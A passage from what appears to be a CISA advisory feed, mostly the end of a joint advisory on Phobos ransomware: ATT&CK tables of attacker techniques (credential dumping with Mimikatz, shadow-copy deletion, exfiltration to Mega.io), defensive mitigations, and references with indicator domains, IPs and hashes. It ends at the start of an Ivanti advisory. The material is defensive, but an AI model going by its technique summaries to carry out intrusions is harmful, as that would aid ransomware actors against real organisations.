1308. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1027/009/" title="Embedded Payloads">T1027.009</a></td>
1309. <td>Phobos actors embedded the ransomware as a hidden payload by using Smokeloader.</td>
1310. </tr>
1311. <tr>
1312. <td>Deobfuscate/Decode Files or Information</td>
1313. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1140/" title="Deobfuscate/Decode Files or Information">T1140</a></td>
1314. <td>During phase two of execution, Phobos actors’ malware stores and decrypts information.</td>
1315. </tr>
1316. <tr>
1317. <td>System Binary Proxy Execution: Mshta</td>
1318. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1218/005/" title="System Binary Proxy Execution: Mshta">T1218.005</a></td>
1319. <td>Phobos actors used Mshta to execute malicious files.</td>
1320. </tr>
1321. <tr>
1322. <td>Impair Defenses</td>
1323. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1562/" title="Impair Defenses">T1562</a></td>
1324. <td>Phobos actors can use Universal Virus Sniffer, Process Hacker, and PowerTool to evade detection.</td>
1325. </tr>
1326. <tr>
1327. <td>Disable or Modify System Firewall</td>
1328. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1562/004/" title="Disable or Modify System Firewall">T1562.004</a></td>
1329. <td>Phobos ransomware has been observed bypassing organizational network defense protocols through modifying system firewall configurations.</td>
1330. </tr>
1331. </tbody>
1332. </table>
1333. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1334. <caption><em>Table 17: Phobos Threat Actors ATT&CK Techniques for Enterprise – Credential Access</em></caption>
1335. <thead>
1336. <tr>
1337. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1338. <th scope="col" role="columnheader"><strong>ID</strong></th>
1339. <th scope="col" role="columnheader"><strong>Use</strong></th>
1340. </tr>
1341. </thead>
1342. <tbody>
1343. <tr>
1344. <td>OS Credential Dumping: LSASS Memory</td>
1345. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
1346. <td>Phobos actors used Mimikatz to export credentials.</td>
1347. </tr>
1348. <tr>
1349. <td>OS Credential Dumping: Cached Domain Credentials</td>
1350. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/005/" title="OS Credential Dumping: Cached Domain Credentials">T1003.005</a></td>
1351. <td>Phobos actors use cached domain credentials to authenticate as the domain administrator in the event a domain controller is unavailable.</td>
1352. </tr>
1353. <tr>
1354. <td>Brute Force</td>
1355. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1110/" title="Brute Force">T1110</a></td>
1356. <td>Phobos actors may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.</td>
1357. </tr>
1358. <tr>
1359. <td>Credentials from Password Stores</td>
1360. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1555/" title="Credentials from Password Stores">T1555</a></td>
1361. <td>Phobos actors may search for common password storage locations to obtain user credentials.</td>
1362. </tr>
1363. <tr>
1364. <td>Credentials from Password Stores: Credentials from Web Browsers</td>
1365. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1555/003/" title="Credentials from Password Stores: Credentials from Web Browsers">T1555.003</a></td>
1366. <td>
1367. <p>Phobos actors use Nirsoft or Passview to export client credentials from web browsers.</p>
1368. <p>Phobos actors search for stored credentials in browser clients once they gain initial network access.</p>
1369. </td>
1370. </tr>
1371. <tr>
1372. <td>Credentials from Password Stores: Password Managers</td>
1373. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1555/005/" title="Credentials from Password Stores: Password Managers">T1555.005</a></td>
1374. <td>Phobos actors targeted victim’s databases for password management software.</td>
1375. </tr>
1376. </tbody>
1377. </table>
1378. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1379. <caption><em>Table 18: Phobos Threat Actors ATT&CK Techniques for Enterprise – Discovery</em></caption>
1380. <thead>
1381. <tr>
1382. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1383. <th scope="col" role="columnheader"><strong>ID</strong></th>
1384. <th scope="col" role="columnheader"><strong>Use</strong></th>
1385. </tr>
1386. </thead>
1387. <tbody>
1388. <tr>
1389. <td>Process Discovery</td>
1390. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a></td>
1391. <td>Phobos ransomware is able to run processes.</td>
1392. </tr>
1393. <tr>
1394. <td>System Information Discovery</td>
1395. <td><a href="http://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a></td>
1396. <td>Phobos ransomware is able to enumerate connected storage devices.</td>
1397. </tr>
1398. <tr>
1399. <td>File and Directory Discovery</td>
1400. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a></td>
1401. <td>Phobos ransomware can encrypt user files.</td>
1402. </tr>
1403. <tr>
1404. <td>Domain Account</td>
1405. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Domain Account">T1087.002</a></td>
1406. <td>Phobos threat actor used Bloodhound and Sharphound to enumerate the active directory.</td>
1407. </tr>
1408. </tbody>
1409. </table>
1410. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1411. <caption><em>Table 19: Phobos Threat Actors ATT&CK Techniques for Enterprise – Collection</em></caption>
1412. <thead>
1413. <tr>
1414. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1415. <th scope="col" role="columnheader"><strong>ID</strong></th>
1416. <th scope="col" role="columnheader"><strong>Use</strong></th>
1417. </tr>
1418. </thead>
1419. <tbody>
1420. <tr>
1421. <td>Archive Collected Data</td>
1422. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1560/" title="Archive Collected Data">T1560</a></td>
1423. <td>Phobos threat actors archive data as either a <code>.rar</code> or <code>.zip</code> file to be later exfiltrated.</td>
1424. </tr>
1425. </tbody>
1426. </table>
1427. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1428. <caption><em>Table 20: Phobos Threat Actors ATT&CK Techniques for Enterprise – Command and Control</em></caption>
1429. <thead>
1430. <tr>
1431. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1432. <th scope="col" role="columnheader"><strong>ID</strong></th>
1433. <th scope="col" role="columnheader"><strong>Use</strong></th>
1434. </tr>
1435. </thead>
1436. <tbody>
1437. <tr>
1438. <td>Data Obfuscation: Protocol Impersonation</td>
1439. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1001/003/" title="Data Obfuscation: Protocol Impersonation">T1001.003</a></td>
1440. <td>Phobos actors used a stealth process to obfuscate C2 activity.</td>
1441. </tr>
1442. <tr>
1443. <td>File Transfer Protocols</td>
1444. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1071/002/" title="File Transfer Protocols">T1071.002</a></td>
1445. <td>Phobos threat actors used <code>WinSCP</code> to connect the victim’s network to an FTP server.</td>
1446. </tr>
1447. <tr>
1448. <td>Ingress Tool Transfer</td>
1449. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
1450. <td>Phobos ransomware extracts its final payload from the hashed file.</td>
1451. </tr>
1452. <tr>
1453. <td>Remote Access Software</td>
1454. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1219/" title="Remote Access Software">T1219</a></td>
1455. <td>Phobos threat actors used remote access tools to establish a remote connection within victim’s network.</td>
1456. </tr>
1457. </tbody>
1458. </table>
1459. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1460. <caption><em>Table 21: Phobos Threat Actors ATT&CK Techniques for Enterprise – Exfiltration</em></caption>
1461. <thead>
1462. <tr>
1463. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1464. <th scope="col" role="columnheader"><strong>ID</strong></th>
1465. <th scope="col" role="columnheader"><strong>Use</strong></th>
1466. </tr>
1467. </thead>
1468. <tbody>
1469. <tr>
1470. <td>Exfiltration</td>
1471. <td><a href="https://attack.mitre.org/versions/v14/tactics/TA0010/" title="Exfiltration">TA0010</a></td>
1472. <td>Phobos threat actors may use exfiltration techniques to steal data from your network.</td>
1473. </tr>
1474. <tr>
1475. <td>Exfiltration Over Alternative Protocol</td>
1476. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a></td>
1477. <td>Phobos threat actors use software to export files to a cloud.</td>
1478. </tr>
1479. <tr>
1480. <td>Exfiltration to Cloud Storage</td>
1481. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration to Cloud Storage">T1567.002</a></td>
1482. <td>Phobos threat actors use <code>Mega.io</code> to exfiltrate data to a cloud storage service rather than over their primary command and control channel.</td>
1483. </tr>
1484. </tbody>
1485. </table>
1486. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1487. <caption>Table 22: Phobos Threat Actors ATT&CK Techniques for Enterprise – Impact</caption>
1488. <thead>
1489. <tr>
1490. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1491. <th scope="col" role="columnheader"><strong>ID</strong></th>
1492. <th scope="col" role="columnheader"><strong>Use</strong></th>
1493. </tr>
1494. </thead>
1495. <tbody>
1496. <tr>
1497. <td>Data Encrypted for Impact</td>
1498. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1486/">T1486</a></td>
1499. <td>Phobos threat actors use the <code>Phobos.exe</code> command to encrypt data on all logical drives connected to the network.</td>
1500. </tr>
1501. <tr>
1502. <td>Inhibit System Recovery</td>
1503. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1490/">T1490</a></td>
1504. <td>Phobos threat actors may delete or remove backups to include volume shadow copies from Windows environments to prevent victim data recovery response efforts.</td>
1505. </tr>
1506. <tr>
1507. <td>Financial Theft</td>
1508. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1657/">T1657</a></td>
1509. <td>Phobos threat actor’s extort victims for financial gain.</td>
1510. </tr>
1511. </tbody>
1512. </table>
1513. <h3><strong>MITIGATIONS</strong></h3>
1514. <p><strong>Secure by Design and Default Mitigations:</strong></p>
1515. <p>These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.</p>
1516. <p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">joint guide</a>.</p>
1517. <p>The FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture against actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
1518. <ul>
1519. <li><strong>Secure remote access software by</strong> applying recommendations from the joint <a href="https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
1520. <li><strong>Implement application controls </strong>to manage and control execution of software, including allowlisting remote access programs.
1521. <ul>
1522. <li>Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlist solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
1523. </ul>
1524. </li>
1525. <li><strong>Implement log collection best practices</strong> and use intrusion detection systems to defend against threat actors manipulating firewall configurations through early detection [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#LogCollection2T" title="Log Collection (2.T)">CPG 2.T</a>].
1526. <ul>
1527. <li>Implement <a href="https://www.cisecurity.org/insights/spotlight/edr-spotlight-module" title="EDR Spotlight Module">EDR solutions</a> to disrupt threat actor memory allocation techniques.</li>
1528. </ul>
1529. </li>
1530. <li><strong>Strictly limit the use of RDP and other remote desktop services</strong>. If RDP is necessary, rigorously apply best practices, for example [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NoExploitableServicesontheInternet2W" title="No Exploitable Services on the Internet (2.W)">CPG 2.W</a>]:
1531. <ul>
1532. <li>Audit the network for systems using RDP.</li>
1533. <li>Close unused RDP ports.</li>
1534. <li>Enforce account lockouts after a specified number of attempts.</li>
1535. <li><a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">Apply phishing-resistant multifactor authentication (MFA)</a>.</li>
1536. <li>Log RDP login attempts.</li>
1537. </ul>
1538. </li>
1539. <li><strong>Disable command-line and scripting</strong> activities and permissions [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DisableMacrosbyDefault2N" title="Disable Macros by Default (2.N)">CPG 2.N</a>].</li>
1540. <li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DeploySecurityTXTFiles4C" title="Deploy Security.TXT Files (4.C)">CPG 4.C</a>].</li>
1541. <li><strong>Audit user accounts with administrative privileges</strong> and configure access controls according to the principle of least privilege (PoLP) [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">CPG 2.E</a>].</li>
1542. <li><strong>Reduce the threat of credential compromise</strong> via the following:
1543. <ul>
1544. <li>Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.</li>
1545. <li>Refrain from storing plaintext credentials in scripts.</li>
1546. </ul>
1547. </li>
1548. <li><strong>Implement time-based access for accounts</strong> at the admin level and higher [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ChangingDefaultPasswords2A" title="Changing Default Passwords (2.A)">CPG 2.A</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">2.E</a>].</li>
1549. </ul>
1550. <p>In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:</p>
1551. <ul>
1552. <li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).</li>
1553. <li><strong>Maintain offline backups of data </strong>and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">CPG 2.R</a>].</li>
1554. <li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) <strong>to comply</strong> with NIST's <a href="https://pages.nist.gov/800-63-3/" title="Digital Identity Guidelines">standards</a> for developing and managing password policies.
1555. <ul>
1556. <li>Use longer passwords consisting of at least 15 characters and no more than 64 characters in length [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MinimumPasswordStrength2B" title="Minimum Password Strength (2.B)">CPG 2.B</a>].</li>
1557. <li>Store passwords in hashed format using industry-recognized password managers.</li>
1558. <li>Add password user “salts” to shared login credentials.</li>
1559. <li>Avoid reusing passwords [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#UniqueCredentials2C" title="Unique Credentials (2.C)">CPG 2.C</a>].</li>
1560. <li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectionofUnsuccessfulAutomatedLoginAttempts2G" title="Detection of Unsuccessful (Automated) Login Attempts (2.G)">CPG 2.G</a>].</li>
1561. <li>Disable password “hints.”</li>
1562. <li>Refrain from requiring password changes more frequently than once per year.<br><strong>Note:</strong> NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
1563. <li>Require administrator credentials to install software.</li>
1564. </ul>
1565. </li>
1566. <li><strong>Require phishing-resistant multifactor authentication (MFA)</strong> for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CPG 2.H</a>].</li>
1567. <li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>].</li>
1568. <li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CPG 3.A</a>].</li>
1569. <li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
1570. <li><strong>Disable unused</strong> <strong>ports and protocols</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ProhibitConnectionofUnauthorizedDevices2V" title="Prohibit Connection of Unauthorized Devices (2.V)">CPG 2.V</a>].</li>
1571. <li><strong>Consider adding an email banner to emails</strong> received from outside your organization [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#EmailSecurity2M" title="Email Security (2.M)">CPG 2.M</a>].</li>
1572. <li><strong>Disable hyperlinks</strong> in received emails.</li>
1573. <li><strong>Ensure all backup data is encrypted, immutable </strong>(i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#StrongandAgileEncryption2K" title="Strong and Agile Encryption (2.K)">CPG 2.K</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Secure Sensitive Data (2.L)">2.L</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">2.R</a>].</li>
1574. </ul>
1575. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
1576. <p>In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
1577. <p>To get started:</p>
1578. <ol>
1579. <li>Select an ATT&CK technique described in this advisory (see Tables 4-16).</li>
1580. <li>Align your security technologies against the technique.</li>
1581. <li>Test your technologies against the technique.</li>
1582. <li>Analyze your detection and prevention technologies’ performance.</li>
1583. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
1584. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
1585. </ol>
1586. <p>The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
1587. <h3><strong>RESOURCES</strong></h3>
1588. <ul>
1589. <li><a href="https://www.stopransomware.gov/" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
1590. <li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">CISA, NSA, FBI, and Multi-State Information Sharing and Analysis Center’s (MS-ISAC) Joint #StopRansomware Guide</a>.</li>
1591. <li>SLTT organizations are encouraged to implement MS-ISAC’s <a href="https://www.cisecurity.org/insights/white-papers/ransomware-defense-in-depth" title="Ransomware Defense-in-Depth">Ransomware Defense-in-Depth</a> guidance.</li>
1592. <li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a>.</li>
1593. <li>CISA: <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities Catalog</a></li>
1594. <li>CISA, MITRE: <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a></li>
1595. <li>CISA: <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a></li>
1596. <li>CISA: <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a></li>
1597. <li>CISA: <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a></li>
1598. <li>CISA: <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">Implementing Phishing-Resistant MFA</a></li>
1599. <li>CISA: <a href="https://www.cisa.gov/sites/default/files/2023-06/Guide%20to%20Securing%20Remote%20Access%20Software_clean%20Final_508c.pdf" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a></li>
1600. </ul>
1601. <h3><strong>REFERENCES</strong></h3>
1602. <p>[1] Privacy Affairs: <a href="https://www.privacyaffairs.com/moral-8-base-ransomware-targets-2-new-victims/" title="“Moral” 8Base Ransomware Targets 2 New Victims">“Moral” 8Base Ransomware Targets 2 New Victims</a><br>[2] VMware: <a href="https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html" title="8base ransomware: A Heavy Hitting Player">8base ransomware: A Heavy Hitting Player</a><br>[3] Infosecurity Magazine: <a href="https://www.infosecurity-magazine.com/news/phobos-ransomware-new-faust-variant/" title="Phobos Ransomware Family Expands With New FAUST Variant">Phobos Ransomware Family Expands With New FAUST Variant</a><br>[4] The Record: <a href="https://therecord.media/romanian-hospitals-offline-after-ransomware-attack" title="Hospitals offline across Romania following ransomware attack on IT platform">Hospitals offline across Romania following ransomware attack on IT platform</a><br>[5] Comparitech: <a href="https://www.comparitech.com/net-admin/phobos-ransomware/" title="What is Phobos Ransomware & How to Protect Against It?">What is Phobos Ransomware & How to Protect Against It?</a><br>[6] Cisco Talos: <a href="https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/" title="Understanding the Phobos affiliate structure and activity">Understanding the Phobos affiliate structure and activity</a><br>[7] Cisco Talos: <a href="https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/" title="A deep dive into Phobos ransomware, recently deployed by 8Base group">A deep dive into Phobos ransomware, recently deployed by 8Base group</a><br>[8] Malwarebytes Labs: <a href="https://www.malwarebytes.com/blog/news/2019/07/a-deep-dive-into-phobos-ransomware" title="A deep dive into Phobos ransomware">A deep dive into Phobos ransomware</a><br>[9] Any Run: <a href="https://any.run/malware-trends/smoke" title="Smoke Loader">Smokeloader</a><br>[10] Malpedia: <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader" title="SmokeLoader">Smokeloader</a><br>[11] Truesec: <a href="https://www.truesec.com/hub/blog/a-case-of-the-faust-ransomware" title="A case of the FAUST Ransomware">A case of the FAUST Ransomware</a><br>[12] VirusTotal: <a href="https://www.virustotal.com/gui/domain/demstat577d.xyz" title="Phobos Domain #1">Phobos Domain #1</a><br>[13] VirusTotal: <a href="https://www.virustotal.com/gui/file/0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f" title="Phobos executable: Ahpdate.exe">Phobos executable: Ahpdate.exe</a><br>[14] VirusTotal: <a href="https://www.virustotal.com/gui/file/7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0" title="Phobos GUI extension: ELF File">Phobos GUI extension: ELF File</a><br>[15] VirusTotal: <a href="https://www.virustotal.com/gui/ip-address/185.202.0.111/relations%20Win32.exe%20file%20cobaltstrike_shellcode.exe%20last%20scanned%20September%202023" title="Phobos IP address: 185.202.0[.]111">Phobos IP address: 185.202.0[.]111</a><br>[16] VirusTotal: <a href="https://www.virustotal.com/gui/file/f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c" title="Phobos GUI extension: Binary File"><u>Phobos GUI extension: Binary File</u></a><br>[17] Cisco Talos GitHub: <a href="https://github.com/Cisco-Talos/IOCs/blob/main/2023/11/deep-dive-into-phobos-ransomware.txt" title="Cisco-Talos / IOCs">IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main</a></p>
1603. <h3><strong>REPORTING</strong></h3>
1604. <p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom-note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
1605. <p>Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.</p>
1606. <p>The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center</a> (IC3), a local FBI <a href="https://www.fbi.gov/contact-us/field-offices/" title="Field Offices">Field Office</a>, or to CISA at <a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or by calling 1-844-Say-CISA (1-844-729-2472).</p>
1607. <h3><strong>DISCLAIMER</strong></h3>
1608. <p>The FBI does not conduct its investigative activities or base attribution solely on activities protected by the First Amendment. Your company has no obligation to respond or provide information back to the FBI in response to this engagement. If, after reviewing the information, your company decides to provide referral information to the FBI, it must do so in a manner consistent with federal law. The FBI does not request or expect your company to take any particular action regarding this information other than holding it in confidence due to its sensitive nature.</p>
1609. <p>The information in this report is being provided “as is” for informational purposes only. The FBI and CISA not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.</p>
1610. <h3><strong>ACKNOWLEDGEMENTS</strong></h3>
1611. <p>The California Joint Regional Intelligence Center (JRIC, CA) and Israel National Cyber Directorate (INCD) contributed to this CSA.</p>
1612. <h3><strong>VERSION HISTORY</strong></h3>
1613. <p>February 29, 2024: Initial version.</p>
1614. </description>
1615.  <pubDate>Mon, 26 Feb 2024 09:51:34 EST</pubDate>
1616.    <dc:creator>CISA</dc:creator>
1617.    <guid isPermaLink="false">/node/21019</guid>
1618.    </item>
1619. <item>
1620.  <title>Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways</title>
1621.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b</link>
1622.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
1623. <p>The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations:</p>
1624. <ul>
1625. <li>Federal Bureau of Investigation (FBI)</li>
1626. <li>Multi-State Information Sharing & Analysis Center (MS-ISAC)</li>
1627. <li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
1628. <li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
1629. <li>Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment</li>
1630. <li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
1631. <li>CERT-New Zealand (CERT NZ)</li>
1632. </ul>
1633. <p>Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.</p>
